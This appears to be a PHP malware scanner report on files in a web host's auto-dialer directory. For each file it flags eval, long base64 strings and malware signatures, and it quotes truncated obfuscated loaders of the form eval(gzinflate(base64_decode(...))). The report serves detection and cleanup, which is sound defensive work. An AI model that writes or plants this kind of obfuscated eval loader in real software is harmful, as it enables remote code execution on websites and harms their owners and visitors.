<?php 'H4sIAAAAAAAEAO09bXPbxtGf5Rn/hwvHLUmHlmyl/WLHfiJLdKJ5HCmV6HQ6rgeBSFBCQwIsAEpWU//3Z3fvBfcGECApR8kTjseSiLu9vb3dvX27w8MHDx/sPX74gD1mo6s4Z9N4FrFxmhRhnOQsnM1YcRWxcFmkbBKHsyhj02UyLuI0ybHT3sMH8m8WZll4GyzCyzi57D2Kk8WyGLBH8HcEP/Kr9CZYRBk+j/rsl4cPdh7lRZgV7CXrUaMnz/qAhNnwBTaLkgk0Eq2/9LUYp8sEAdFPMXQfnsCzeArgedev2VP23/8y0fprCbIPrXayqFhmYgo97LoTzfKIUe+yPWDitA7yWTyOyvlymBJCo9YDgsyeaJ0/IfIPH+D4X0gCB9HHOC/yXjecBPRvEozD+SKML5Nuv/8c2zP47D1+zH9RSyoX6CaG5YRuLGSyI4sTWFlc4vw2L6K56vnN5Sy9CGfs6DV7NLkAQBET30zCIrwIgTjpxb+...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09bXPbxtGf5Rn/hwvHLUmHlmyl/WLHfiJLdKJ5HCmV6HQ6rgeBSFBCQwIsAEpWU//3Z3fvBfcGECApR8kTjseSiLu9vb3dvX27w8MHDx/sPX74gD1mo6s4Z9N4FrFxmhRhnOQsnM1YcRWxcFmkbBKHsyhj02UyLuI0ybHT3sMH8m8WZll4GyzCyzi57D2Kk8WyGLBH8HcEP/Kr9CZYRBk+j/rsl4cPdh7lRZgV7CXrUaMnz/qAhNnwBTaLkgk0Eq2/9LUYp8sEAdFPMXQfnsCzeArgedev2VP23/8y0fprCbIPrXayqFhmYgo97LoTzfKIUe+yPWDitA7yWTyOyvlymBJCo9YDgsyeaJ0/IfIPH+D4X0gCB9HHOC/yXjecBPRvEozD+SKML5Nuv/8c2zP47D1+zH9RSyoX6CaG5YRuLGSyI4sTWFlc4vw2L6K56vn...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09bXPbxtGf5Rn/hwvHLUmHlmyl/WLHfiJLdKJ5HCmV6HQ6rgeBSFBCQwIsAEpWU//3Z3fvBfcGECApR8kTjseSiLu9vb3dvX27w8MHDx/sPX74gD1mo6s4Z9N4FrFxmhRhnOQsnM1YcRWxcFmkbBKHsyhj02UyLuI0ybHT3sMH8m8WZll4GyzCyzi57D2Kk8WyGLBH8HcEP/Kr9CZYRBk+j/rsl4cPdh7lRZgV7CXrUaMnz/qAhNnwBTaLkgk0Eq2/9LUYp8sEAdFPMXQfnsCzeArgedev2VP23/8y0fprCbIPrXayqFhmYgo97LoTzfKIUe+yPWDitA7yWTyOyvlymBJCo9YDgsyeaJ0/IfIPH+D4X0gCB9HHOC/yXjecBPRvEozD+SKML5Nuv/8c2zP47D1+zH9RSyoX6CaG5YRuLGSyI4sTWFlc4vw2L6K56vn...

Sign 7830f7a6 Line: 3 Dangerous

Malware Signature (hash: 7830f7a6)

<?php Nvch

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/lib/ad_lib_funcs.php

Size: 10.41 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1de3PbOJL/e6dqvgOi8q6krOLE2XvsZc6ZdWxlx3UeO2crczWXcymUSNvcUKKGpOx4s/nu140X8SQpWU7krFQzjkQCYKPR+KG70Wh+/9333z19epQGYTy9JMVVRMbp9CK+nGdBEadTchEn0fffZdFv8ziLhul0HJE2K7EdT+Pt2dWs/cP3VhtBnqfjOCiikDaQkyJNzVaCcAj/JfFoeDGfjnPRlFXoemQXwucdXhC8RqmcpgUJkiwKwluSAB3w3HhKZll6mQWT77+LL0jnkSg8jD7GeZF3sO1wNLwKpmESDcOgCIZFMAJi293uC3wEgc/Tx4/ZF/KYdE77P5/80j/oksFVnJcPv4mThIzh4QV0fF6kJIyDJMoIaw0JOXhFgASVSEbDtmz7L5dJOgoSLLkVjuABEeFXkLBRkEckHf0tGheixlP2RRLh60ynSz6JznzGL9E0jC8oC71cCULg+TgZxjn+ZTd8THGx4io...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de3PbOJL/e6dqvgOi8q6krOLE2XvsZc6ZdWxlx3UeO2crczWXcymUSNvcUKKGpOx4s/nu140X8SQpWU7krFQzjkQCYKPR+KG70Wh+/9333z19epQGYTy9JMVVRMbp9CK+nGdBEadTchEn0fffZdFv8ziLhul0HJE2K7EdT+Pt2dWs/cP3VhtBnqfjOCiikDaQkyJNzVaCcAj/JfFoeDGfjnPRlFXoemQXwucdXhC8RqmcpgUJkiwKwluSAB3w3HhKZll6mQWT77+LL0jnkSg8jD7GeZF3sO1wNLwKpmESDcOgCIZFMAJi293uC3wEgc/Tx4/ZF/KYdE77P5/80j/oksFVnJcPv4mThIzh4QV0fF6kJIyDJMoIaw0JOXhFgASVSEbDtmz7L5dJOgoSLLkVjuABEeFXkLBRkEckHf0tGheixlP2RRLh60ynSz6Jznz...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de3PbOJL/e6dqvgOi8q6krOLE2XvsZc6ZdWxlx3UeO2crczWXcymUSNvcUKKGpOx4s/nu140X8SQpWU7krFQzjkQCYKPR+KG70Wh+/9333z19epQGYTy9JMVVRMbp9CK+nGdBEadTchEn0fffZdFv8ziLhul0HJE2K7EdT+Pt2dWs/cP3VhtBnqfjOCiikDaQkyJNzVaCcAj/JfFoeDGfjnPRlFXoemQXwucdXhC8RqmcpgUJkiwKwluSAB3w3HhKZll6mQWT77+LL0jnkSg8jD7GeZF3sO1wNLwKpmESDcOgCIZFMAJi293uC3wEgc/Tx4/ZF/KYdE77P5/80j/oksFVnJcPv4mThIzh4QV0fF6kJIyDJMoIaw0JOXhFgASVSEbDtmz7L5dJOgoSLLkVjuABEeFXkLBRkEckHf0tGheixlP2RRLh60ynSz6Jznz...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/lib/ad_vb_lib_funcs.php

Size: 7.61 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3PbRpKfL1X5D2OU1yR9NJm46qqu7KMTWqIT3clSTqS9tae4sCABSriAAIOHZO3G//26ZwbAvPCiKFnOmalYEjDT09M9/ZjunuG333z7zfjpt9+Qp2Rx6Sdk7QceWUVh6vhhQpwgIOmlR64if+WRZRw57spJUrLOwlXqR2GCHcfffuOvSf9R/tD2PvpJmvR7jmtfLW3Hde2Vs9k6/kXYGwxefAsjEviMnz5lvxRD8/7k2odhoRtxSN6R+GEaUVSSmyT1NkXPHy+CaOkE5PA1eewuAZBH+BPXSZ2lk3gkWv6vt0rJ1ovXUbwh0CqC350cfw5n68TOhjhx7NyQxwXCNkIh05C/4ITxw4sSM9rCuUB6pQh8FQXZJiShs/EE8LGXZnFINv5HzyVHhyRakwApCb28OIVncXRNopgsoyjwnJCsnQBRx1+AIy75PfPimxzcmP1SEEwndF+dwoTNoD8YkH9yMMiD8VGY+k7...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbRpKfL1X5D2OU1yR9NJm46qqu7KMTWqIT3clSTqS9tae4sCABSriAAIOHZO3G//26ZwbAvPCiKFnOmalYEjDT09M9/ZjunuG333z7zfjpt9+Qp2Rx6Sdk7QceWUVh6vhhQpwgIOmlR64if+WRZRw57spJUrLOwlXqR2GCHcfffuOvSf9R/tD2PvpJmvR7jmtfLW3Hde2Vs9k6/kXYGwxefAsjEviMnz5lvxRD8/7k2odhoRtxSN6R+GEaUVSSmyT1NkXPHy+CaOkE5PA1eewuAZBH+BPXSZ2lk3gkWv6vt0rJ1ovXUbwh0CqC350cfw5n68TOhjhx7NyQxwXCNkIh05C/4ITxw4sSM9rCuUB6pQh8FQXZJiShs/EE8LGXZnFINv5HzyVHhyRakwApCb28OIVncXRNopgsoyjwnJCsnQBRx1+AIy75PfPimxz...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbRpKfL1X5D2OU1yR9NJm46qqu7KMTWqIT3clSTqS9tae4sCABSriAAIOHZO3G//26ZwbAvPCiKFnOmalYEjDT09M9/ZjunuG333z7zfjpt9+Qp2Rx6Sdk7QceWUVh6vhhQpwgIOmlR64if+WRZRw57spJUrLOwlXqR2GCHcfffuOvSf9R/tD2PvpJmvR7jmtfLW3Hde2Vs9k6/kXYGwxefAsjEviMnz5lvxRD8/7k2odhoRtxSN6R+GEaUVSSmyT1NkXPHy+CaOkE5PA1eewuAZBH+BPXSZ2lk3gkWv6vt0rJ1ovXUbwh0CqC350cfw5n68TOhjhx7NyQxwXCNkIh05C/4ITxw4sSM9rCuUB6pQh8FQXZJiShs/EE8LGXZnFINv5HzyVHhyRakwApCb28OIVncXRNopgsoyjwnJCsnQBRx1+AIy75PfPimxz...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/lib/config.ini.php

Size: 583.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVSTW+CMBi+m/Af3hvbssh9O1VghoTZRZnXptCKTWq72Or+/kpFN1SG2RIuTd7nm2AUjKKHYAQPUKyFgZWQHCqtLBXKgF37h7FU2eZFLdAth1oLVYPVUHLYGc5AKKA7bYEJKvkWqGKw16LiUG41ZRU1dtxIRIFXa+Vo6aRW2p3vHFULrejmg4pamfae8ZVQ/C5ECUHvBSZJhvJ0TmL0+oay6WwRPkJIGXHfCRnePw/rGJegSUqlBMZdWjmomOckSQuU5R1RKUmLd7oQRVDgBD/BnG/0no8PpX5S40Qkt5yNb6nAeZK6vsFPjqdnXhyuN//ZJL91vcRZnJLJHKMkRoviou99eUPf/9LrpPNyA+k6FTY/cGWvTZosJyTGswLFxfeODX8L8fw9AIJfzp02FD4nOeUcYvixojfgfJOD795sx+ZAacv7Us1wkXYi+eN+zkNgkMIMFUXybHG1LeLBQxK97Pn1JWR3jL8xX7T...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVSTW+CMBi+m/Af3hvbssh9O1VghoTZRZnXptCKTWq72Or+/kpFN1SG2RIuTd7nm2AUjKKHYAQPUKyFgZWQHCqtLBXKgF37h7FU2eZFLdAth1oLVYPVUHLYGc5AKKA7bYEJKvkWqGKw16LiUG41ZRU1dtxIRIFXa+Vo6aRW2p3vHFULrejmg4pamfae8ZVQ/C5ECUHvBSZJhvJ0TmL0+oay6WwRPkJIGXHfCRnePw/rGJegSUqlBMZdWjmomOckSQuU5R1RKUmLd7oQRVDgBD/BnG/0no8PpX5S40Qkt5yNb6nAeZK6vsFPjqdnXhyuN//ZJL91vcRZnJLJHKMkRoviou99eUPf/9LrpPNyA+k6FTY/cGWvTZosJyTGswLFxfeODX8L8fw9AIJfzp02FD4nOeUcYvixojfgfJOD795sx+ZAacv7Us1wkXYi+eN+zkN...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVSTW+CMBi+m/Af3hvbssh9O1VghoTZRZnXptCKTWq72Or+/kpFN1SG2RIuTd7nm2AUjKKHYAQPUKyFgZWQHCqtLBXKgF37h7FU2eZFLdAth1oLVYPVUHLYGc5AKKA7bYEJKvkWqGKw16LiUG41ZRU1dtxIRIFXa+Vo6aRW2p3vHFULrejmg4pamfae8ZVQ/C5ECUHvBSZJhvJ0TmL0+oay6WwRPkJIGXHfCRnePw/rGJegSUqlBMZdWjmomOckSQuU5R1RKUmLd7oQRVDgBD/BnG/0no8PpX5S40Qkt5yNb6nAeZK6vsFPjqdnXhyuN//ZJL91vcRZnJLJHKMkRoviou99eUPf/9LrpPNyA+k6FTY/cGWvTZosJyTGswLFxfeODX8L8fw9AIJfzp02FD4nOeUcYvixojfgfJOD795sx+ZAacv7Us1wkXYi+eN+zkN...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/ad_autodial_status_callback.php

Size: 2.68 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVYe2/bOBL/P0C+A9cIVvKtEydBccClZxeuraDZdWOfrdzetVtoaYm2uSuLWpLKo9d+95uhHpZsye7eGQFik/ObN2eGPD3pdqdUKR6tiF5LstY6JteXl0T8TtaMBkwSLYh4ZFLygAEJI68uXxH4KSRZvJCn+HwRitV5SnsRr+PTk/S73XrnutPu1cWV4Tf5qdV+fXpyCvLmTOtUHiO+iDSLNNEvghGxJIHwk41ZEORf78cdMhcd4tMwZFIRtRZJGBAtGQWCNVeE+r6QATALXwq51jDlea5fYnZDNHvW3edNaOXix4IGufiI+T5TisoXsuQhU6cnkv2RcMk8EfmMWBcX3UTzEO2yXtdsTumKR1RzETWS6CcecuFtHWRletxFfpgUmoR8IVGNQQKWjzgFgwmNAvJPwYHRWwlK+1TpejUB3KWBB/+8ZRL5aivGBMqTLBYSfW473mA8Rk/wiHuKabsVcBWH9MUzlKrVAfc...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVYe2/bOBL/P0C+A9cIVvKtEydBccClZxeuraDZdWOfrdzetVtoaYm2uSuLWpLKo9d+95uhHpZsye7eGQFik/ObN2eGPD3pdqdUKR6tiF5LstY6JteXl0T8TtaMBkwSLYh4ZFLygAEJI68uXxH4KSRZvJCn+HwRitV5SnsRr+PTk/S73XrnutPu1cWV4Tf5qdV+fXpyCvLmTOtUHiO+iDSLNNEvghGxJIHwk41ZEORf78cdMhcd4tMwZFIRtRZJGBAtGQWCNVeE+r6QATALXwq51jDlea5fYnZDNHvW3edNaOXix4IGufiI+T5TisoXsuQhU6cnkv2RcMk8EfmMWBcX3UTzEO2yXtdsTumKR1RzETWS6CcecuFtHWRletxFfpgUmoR8IVGNQQKWjzgFgwmNAvJPwYHRWwlK+1TpejUB3KWBB/+8ZRL5aivGBMqTLBY...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVYe2/bOBL/P0C+A9cIVvKtEydBccClZxeuraDZdWOfrdzetVtoaYm2uSuLWpLKo9d+95uhHpZsye7eGQFik/ObN2eGPD3pdqdUKR6tiF5LstY6JteXl0T8TtaMBkwSLYh4ZFLygAEJI68uXxH4KSRZvJCn+HwRitV5SnsRr+PTk/S73XrnutPu1cWV4Tf5qdV+fXpyCvLmTOtUHiO+iDSLNNEvghGxJIHwk41ZEORf78cdMhcd4tMwZFIRtRZJGBAtGQWCNVeE+r6QATALXwq51jDlea5fYnZDNHvW3edNaOXix4IGufiI+T5TisoXsuQhU6cnkv2RcMk8EfmMWBcX3UTzEO2yXtdsTumKR1RzETWS6CcecuFtHWRletxFfpgUmoR8IVGNQQKWjzgFgwmNAvJPwYHRWwlK+1TpejUB3KWBB/+8ZRL5aivGBMqTLBY...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/ad_autodial_twiml.php

Size: 923.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1T72/TMBD9Hin/w8malFSUZkMIIdYfH2CICQRj6z6hyXLta2NI7GA7Wstfj+007RqBtEhNk7uXe/fendOkKG6YtVJtwJUIr87P4a7lHK2F2t/YBtOkRCbQ5OTTcnlTXEwuIurbZzK6TJN0UIBr5VA5cLsGQa+Bt8aEd6F5W8eEBmeQ+YdSWmCcayP8x9XuyPO+q/Ey1HgHDreu2NbVge5aSSdZJf/0nNY3KrVKk/0DtY4Zl/f4L5qJHqowamNmB5VcmfC/lhXaNDH4u5UGgUwmhRexlptJUzbk8jQjVoMo1YojZD7lHmUlNe1EBFS25z9bNzCDtW5Q5RlnVSWYYxO3ddkYMvYiC30WxfrRSIe5B4+hMVI5avIzenv1/f7qbjmG5e391WiP5JW2EdkpPPNyXWtpKL1i/BdtmGG19ZwrZvHNa4qKa4G5RRNtw5wZw3Z5moC/stbHM5jN4cD2I8akyB7Ge8xSDxDE6UB...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1T72/TMBD9Hin/w8malFSUZkMIIdYfH2CICQRj6z6hyXLta2NI7GA7Wstfj+007RqBtEhNk7uXe/fendOkKG6YtVJtwJUIr87P4a7lHK2F2t/YBtOkRCbQ5OTTcnlTXEwuIurbZzK6TJN0UIBr5VA5cLsGQa+Bt8aEd6F5W8eEBmeQ+YdSWmCcayP8x9XuyPO+q/Ey1HgHDreu2NbVge5aSSdZJf/0nNY3KrVKk/0DtY4Zl/f4L5qJHqowamNmB5VcmfC/lhXaNDH4u5UGgUwmhRexlptJUzbk8jQjVoMo1YojZD7lHmUlNe1EBFS25z9bNzCDtW5Q5RlnVSWYYxO3ddkYMvYiC30WxfrRSIe5B4+hMVI5avIzenv1/f7qbjmG5e391WiP5JW2EdkpPPNyXWtpKL1i/BdtmGG19ZwrZvHNa4qKa4G5RRNtw5wZw3Z...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1T72/TMBD9Hin/w8malFSUZkMIIdYfH2CICQRj6z6hyXLta2NI7GA7Wstfj+007RqBtEhNk7uXe/fendOkKG6YtVJtwJUIr87P4a7lHK2F2t/YBtOkRCbQ5OTTcnlTXEwuIurbZzK6TJN0UIBr5VA5cLsGQa+Bt8aEd6F5W8eEBmeQ+YdSWmCcayP8x9XuyPO+q/Ey1HgHDreu2NbVge5aSSdZJf/0nNY3KrVKk/0DtY4Zl/f4L5qJHqowamNmB5VcmfC/lhXaNDH4u5UGgUwmhRexlptJUzbk8jQjVoMo1YojZD7lHmUlNe1EBFS25z9bNzCDtW5Q5RlnVSWYYxO3ddkYMvYiC30WxfrRSIe5B4+hMVI5avIzenv1/f7qbjmG5e391WiP5JW2EdkpPPNyXWtpKL1i/BdtmGG19ZwrZvHNa4qKa4G5RRNtw5wZw3Z...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/ad_status_callback.php

Size: 2.97 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANVYbW/bOBL+HiD/gSsEkXzr2OliDzgkdbKO41675ybZ2O0eLi0EWqJtXiVRS1JJvEX/+w1JvVCynLjdxQKnL4nJ4czDeXk45P5ev3+DhaDJEskVRyspU/TD8TFin9CK4JBwJBli94RzGhIQIejH4x8R/GQczdfoIT2aR2x5ZGR76Srd3zP/e87r2eym/6L3Quu7/pfTOd3f2wd7UyKlsUdQwBJJEonkmhHEFihkQRbrAYb+/XbSRVPWRQGOIsIFEiuWRSGSnGAQWFGBcBAwHoKyaF3adUdG55Fcp+QESfIo+49x5BbmJwyHhfmEBAERAvM1WtCIiP09Tn7LKCc+SwKC3F6vn0kaqX25py2TN3hJEywpS7aKyAcaUeZXDnJzHG+SIMpKJBGdcwVjmMHOLymGDSOchOg9o6DoggPoAAvZDhMW93Howx9/kSWBqJuhEtTR3wtLIZZ4jgW4e/5fEsj9vYNwjgbgigd0eeE...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVYbW/bOBL+HiD/gSsEkXzr2OliDzgkdbKO41675ybZ2O0eLi0EWqJtXiVRS1JJvEX/+w1JvVCynLjdxQKnL4nJ4czDeXk45P5ev3+DhaDJEskVRyspU/TD8TFin9CK4JBwJBli94RzGhIQIejH4x8R/GQczdfoIT2aR2x5ZGR76Srd3zP/e87r2eym/6L3Quu7/pfTOd3f2wd7UyKlsUdQwBJJEonkmhHEFihkQRbrAYb+/XbSRVPWRQGOIsIFEiuWRSGSnGAQWFGBcBAwHoKyaF3adUdG55Fcp+QESfIo+49x5BbmJwyHhfmEBAERAvM1WtCIiP09Tn7LKCc+SwKC3F6vn0kaqX25py2TN3hJEywpS7aKyAcaUeZXDnJzHG+SIMpKJBGdcwVjmMHOLymGDSOchOg9o6DoggPoAAvZDhMW93Howx9/kSWBqJuhEtT...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVYbW/bOBL+HiD/gSsEkXzr2OliDzgkdbKO41675ybZ2O0eLi0EWqJtXiVRS1JJvEX/+w1JvVCynLjdxQKnL4nJ4czDeXk45P5ev3+DhaDJEskVRyspU/TD8TFin9CK4JBwJBli94RzGhIQIejH4x8R/GQczdfoIT2aR2x5ZGR76Srd3zP/e87r2eym/6L3Quu7/pfTOd3f2wd7UyKlsUdQwBJJEonkmhHEFihkQRbrAYb+/XbSRVPWRQGOIsIFEiuWRSGSnGAQWFGBcBAwHoKyaF3adUdG55Fcp+QESfIo+49x5BbmJwyHhfmEBAERAvM1WtCIiP09Tn7LKCc+SwKC3F6vn0kaqX25py2TN3hJEywpS7aKyAcaUeZXDnJzHG+SIMpKJBGdcwVjmMHOLymGDSOchOg9o6DoggPoAAvZDhMW93Howx9/kSWBqJuhEtT...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/ad_twiml.php

Size: 2.93 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1abU/jRhD+jsR/2Fq0SSqIj6ofKiAgXnwHPThSkrtTdaqsjb1JtvVLaq+BtOW/d3b9bu/azkHbD1ekO4I988zszsyz44m3t3R9jMOQegvElgR99+oVmkSWRcIQufAfXpDtrSXBNgn62uV0Otb3h/tC6vatNjjc3tquAFi+x4jHEFuvCPLnyIqCgP9t+1bkihs+YgHB8GFJQ4Qtyw9sUHbWuZ3zGGOPYxwgRh6Z/ug6mblrH9upOY8IX3GwRnPqkHB7KyC/RzQgpu9ZBPWGQz1i1BmulqveoeTmGC+ohxn1PaUIe6AO9c3YuVSK+3HlWU6UeeLQWcDdOI1ghRcUOyRA2LPRB58C0FkATls4ZHI3QVnHtgm/zHnkWWHZDGUAR/9ILV2cIX/2K7HY9taOPUMj2IQHuNiP92cnChy4ZtPAwy7phz+YC8LMJAzmA5mtIKZmFND+gCsk4iELzICsHGyRvqZTsTLCXcKwHNM...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1abU/jRhD+jsR/2Fq0SSqIj6ofKiAgXnwHPThSkrtTdaqsjb1JtvVLaq+BtOW/d3b9bu/azkHbD1ekO4I988zszsyz44m3t3R9jMOQegvElgR99+oVmkSWRcIQufAfXpDtrSXBNgn62uV0Otb3h/tC6vatNjjc3tquAFi+x4jHEFuvCPLnyIqCgP9t+1bkihs+YgHB8GFJQ4Qtyw9sUHbWuZ3zGGOPYxwgRh6Z/ug6mblrH9upOY8IX3GwRnPqkHB7KyC/RzQgpu9ZBPWGQz1i1BmulqveoeTmGC+ohxn1PaUIe6AO9c3YuVSK+3HlWU6UeeLQWcDdOI1ghRcUOyRA2LPRB58C0FkATls4ZHI3QVnHtgm/zHnkWWHZDGUAR/9ILV2cIX/2K7HY9taOPUMj2IQHuNiP92cnChy4ZtPAwy7phz+YC8LMJAzmA5mtIKZ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1abU/jRhD+jsR/2Fq0SSqIj6ofKiAgXnwHPThSkrtTdaqsjb1JtvVLaq+BtOW/d3b9bu/azkHbD1ekO4I988zszsyz44m3t3R9jMOQegvElgR99+oVmkSWRcIQufAfXpDtrSXBNgn62uV0Otb3h/tC6vatNjjc3tquAFi+x4jHEFuvCPLnyIqCgP9t+1bkihs+YgHB8GFJQ4Qtyw9sUHbWuZ3zGGOPYxwgRh6Z/ug6mblrH9upOY8IX3GwRnPqkHB7KyC/RzQgpu9ZBPWGQz1i1BmulqveoeTmGC+ohxn1PaUIe6AO9c3YuVSK+3HlWU6UeeLQWcDdOI1ghRcUOyRA2LPRB58C0FkATls4ZHI3QVnHtgm/zHnkWWHZDGUAR/9ILV2cIX/2K7HY9taOPUMj2IQHuNiP92cnChy4ZtPAwy7phz+YC8LMJAzmA5mtIKZ...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/ad_auto_dialer_files/notes_html.php

Size: 1.26 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHVVbW/aSBD+jsR/mHO52FQtTnvv5k1I5KpKufQupV8uiqy1PeBtl11rvRhodf/9ZheMDWn4EOL1zDPPPPPs0O2EL7sdeAmLnJew5AJhy4WAQnNpwOQIuVkLSJU0jEsuVyCVwRKYzMDgzjCNDIwClmXAQOIWlMQBWMiw2+l2wvAejeZY2VQLl7J1wfhKwvt5t9NzuKmJebaDMfTi+5t/Pt18XDz4rRf+47DbmU66nVHGKyjNXuDY2/LM5BH8en1d7IY58lVuImAbo4YeRQJ9RvnbyZ3julQavFEyGU2LvABMc0s3ZlmVxKmIV2jiuprcrBPUQZtWfwjTyShMJt4oJMQjtmWSClaWY89BxVkW153FTiGvZlqTe+uogqpQL4XaHtkWJBxJE8Eb+7bm7mpYts3j80K6ck3gifxhUOPLXt3xRYt2Uk2h90sHfsIGbucNTGu2d4NnRiArjR21i4BMURTuOJ1xCeW+NLhuEPk...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

